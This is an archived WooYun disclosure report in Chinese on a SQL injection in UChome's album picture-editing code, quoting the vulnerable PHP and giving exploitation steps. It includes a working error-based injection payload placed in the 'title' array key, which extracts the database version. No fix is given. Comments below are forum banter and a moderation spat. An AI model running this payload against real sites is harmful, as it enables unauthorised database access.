UChome 注入漏洞 | WooYun-2013-44061

漏洞概要关注数(45) 关注此漏洞

缺陷编号： WooYun-2013-44061

漏洞标题： UChome 注入漏洞

漏洞作者： Matt

提交时间： 2013-11-25 23:04

公开时间： 2014-02-20 23:04

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-25：细节已通知厂商并且等待厂商处理中
2013-11-30：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-01-24：细节向核心白帽子及相关领域专家公开
2014-02-03：细节向普通白帽子公开
2014-02-13：细节向实习白帽子公开
2014-02-20：细节向公众公开

简要描述：

UChome 注入漏洞

详细说明：

code 区域

source/cp_clbum.php


} elseif($_GET['op'] == 'editpic') {


	


	$managealbum = checkperm('managealbum');


	include_once(S_ROOT.'./source/function_bbcode.php');


	


	if($albumid > 0) {


		$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('album')." WHERE albumid='$albumid'");


		if(!$album = $_SGLOBAL['db']->fetch_array($query)) {


			showmessage('no_privilege');


		}


		


		if($album['uid'] != $_SGLOBAL['supe_uid'] && !$managealbum) {


			showmessage('no_privilege');


		}


	}


	


	if(submitcheck('editpicsubmit')) {


		if($_GET['subop'] == 'delete') {


			//删除


			$updates = $deleteids = array();


			foreach ($_POST['title'] as $picid => $value) {


				if(empty($_POST['ids'][$picid])) {


					$title = getstr($value, 150, 1, 1, 1);


					


					$wherearr = array('picid'=>$picid);


					if(!$managealbum) $wherearr['uid']  = $_SGLOBAL['supe_uid'];//自己


					


					updatetable('pic', array('title'=>$title), $wherearr);


				} else {


					$deleteids[$picid] = $picid;


				}


			}


			if($deleteids) {


				include_once(S_ROOT.'./source/function_delete.php');


				deletepics($deleteids);


			}


			


		} elseif($_GET['subop'] == 'update') {


			


			foreach ($_POST['title'] as $picid => $value) {


				$title = getstr($value, 150, 1, 1, 1);//


				//echo 2222222;exit();


				$wherearr = array('picid'=>$picid);//这里可以看到KEY没有过滤~~


				if(!$managealbum) $wherearr['uid']  = $_SGLOBAL['supe_uid'];//自己





				updatetable('pic', array('title'=>$title), $wherearr);


			}

漏洞证明：

利用方法

首先注册用户

然后新建一个相册

**.**.**.**/uchome/space.php?uid=2&do=album&view=me 打开这里点上床

新建完了之后上传一个图片

完了之后点进相册然后在点刚刚上传的图片点击管理图片

直接确认

然后抓包

把titie的那个改成

title%5B1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#%5D

原始内容可能是title%5B1%5D 修改成上面的就可以看到错误信息了

修复方案：

你猜啊~~

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-02-20 23:04

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2013-11-25 23:25 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)
3

会不会很鸡肋。

1# 回复此人
2013-11-25 23:42 | Matt ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
0

@demonalex 哎我也是手贱。。。

2# 回复此人
2013-11-26 02:19 | Ra1nker ( 路人 | 还没有发布任何漏洞 | TeST)
0

mark

3# 回复此人
2013-11-26 06:13 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)
0

额·... UChome貌似很少人用了..

4# 回复此人
2013-11-26 08:46 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0

@demonalex 那发哪里另外再无故骂人请自己走吧

5# 回复此人
2013-11-26 09:13 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)
0

@BadCat 到处都是。。。

6# 回复此人
2013-11-26 09:24 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
0

坐等忽略！

7# 回复此人
2013-11-26 10:05 | 残废 ( 普通白帽子 | Rank:274 漏洞数:58 | 我是残废，啦啦啦啦)
0

UChome。。。。现在有人用么。？

8# 回复此人
2013-11-26 13:28 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮（子帽白心核)
0

不明觉厉！

9# 回复此人
2013-11-26 14:01 | 邪少 ( 实习白帽子 | Rank:94 漏洞数:15 | 百里长苏)
0

@demonalex 你好像不愿意。。很明显你是做黑产的

10# 回复此人
2013-11-26 15:31 | demonalex ( 实习白帽子 | Rank:39 漏洞数:4 | demonalex是傻逼，呵呵呵！)
0

@xsser 你是哪位？

11# 回复此人
2013-11-26 15:31 | demonalex ( 实习白帽子 | Rank:39 漏洞数:4 | demonalex是傻逼，呵呵呵！)
0

@邪少我是包工程的

12# 回复此人
2013-11-26 15:32 | demonalex ( 实习白帽子 | Rank:39 漏洞数:4 | demonalex是傻逼，呵呵呵！)
0

@Matt 别再让我看到有下次

13# 回复此人
2013-11-26 15:54 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0

@demonalex 不会了已封

14# 回复此人
2013-11-26 16:55 | Matt ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
0

@xsser 卧槽这就封了

15# 回复此人
2013-11-26 17:31 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0

@Matt 这货号被盗了

16# 回复此人
2013-11-26 18:21 | Matt ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
0

@xsser soga 我说呢

17# 回复此人
2013-11-27 15:36 | ccp0101 ( 路人 | Rank:25 漏洞数:2 | 无。)
0

对于 @xsser 的作风无语言对这件事看清这个人的作风还以为wooyun老大有多大气呢说了一句“@xsser 你是哪位？ ” 就封号人家来评评理所谓的wooyun就是你在这里都要听wooyun老大的话不然就给你封号

18# 回复此人
2013-11-27 15:54 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0

@ccp0101 http://zone.wooyun.org/content/8612 已经解释骂人的话我已经删了：）

19# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(45) 关注此漏洞

缺陷编号： WooYun-2013-44061

漏洞标题： UChome 注入漏洞

相关厂商： Discuz!

漏洞作者： Matt

提交时间： 2013-11-25 23:04

公开时间： 2014-02-20 23:04

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(45) 关注此漏洞

缺陷编号： WooYun-2013-44061

漏洞标题： UChome 注入漏洞

相关厂商： Discuz!

漏洞作者： Matt

提交时间： 2013-11-25 23:04

公开时间： 2014-02-20 23:04

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

4人收藏 收藏 var token=""; var id="44061"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(45) 关注此漏洞

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分